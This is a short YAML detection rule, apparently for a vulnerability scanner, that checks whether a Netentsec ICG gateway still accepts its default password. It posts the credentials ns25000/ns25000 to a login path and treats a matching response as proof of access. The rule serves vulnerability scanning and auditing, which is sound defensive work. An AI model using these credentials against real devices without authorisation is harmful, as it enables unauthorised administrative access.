id: netentsec-icg-default-password

info:
  name: netentsec icg 默认密码
  author: B1anda0(https://github.com/B1anda0)
  severity: critical
  description: netentsec icg 默认密码
  reference:
    - https://www.cnvd.org.cn/flaw/show/CNVD-2016-08603

rules:
    r0:
        request:
            method: POST
            path: /user/login/checkPermit
            body: usrname=ns25000&pass=ns25000
        expression: response.status == 200 && response.body.bcontains(b"\"agreed\":true")
expression: r0()